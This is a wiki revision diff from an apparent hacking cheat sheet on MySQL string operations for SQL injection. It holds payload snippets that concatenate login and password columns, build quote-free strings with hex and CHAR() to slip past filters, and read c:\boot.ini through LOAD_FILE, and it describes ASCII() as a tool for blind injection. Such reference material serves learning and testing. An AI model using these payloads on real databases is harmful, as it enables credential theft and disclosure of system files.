Differences

This shows you the differences between two versions of the page.

--- hacking:sql_injection:mysql:string_operations [2020/04/16 22:01] – created peter
+++ hacking:sql_injection:mysql:string_operations [2020/07/15 09:30] (current) – external edit 127.0.0.1
@@ Line 9: / Line 9: @@
 SELECT login || '-' || password FROM members
+</code>
+<WRAP info>
+**NOTE:**  About MySQL **"||"**
+If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.
+A better way to do it is using **CONCAT()** function in MySQL:
+<code sql>
+CONCAT(str1, str2, str3, ...) (M)
+/* Concatenate supplied strings. */
+SELECT CONCAT(login, password) FROM members
+</code>
+</WRAP>
+----
+===== Strings without Quotes =====
+These are some direct ways to using strings but it's always possible to use **CHAR()** to generate string without quotes.
+<code sql>
+x457578 /* Hex Representation of string. */
+SELECT 0x457578 /* This will be selected as string in MySQL.*/
+</code>
+In MySQL easy way to generate hex representations of strings use this;
+<code sql>
+SELECT CONCAT('0x',HEX('c:\\boot.ini'))
+SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
+</code>
+Hex based SQL Injection Samples
+<code sql>
+SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
+</code>
+----
+===== String Modification & Related =====
+Return ASCII character value of leftmost character.
+<code sql>
+ASCII()
+SELECT ASCII('a')
+</code>
+A must have function for Blind SQL Injections.
+----
+Convert an integer of ASCII.
+<code sql>
+CHAR()
+SELECT CHAR(64)
 </code>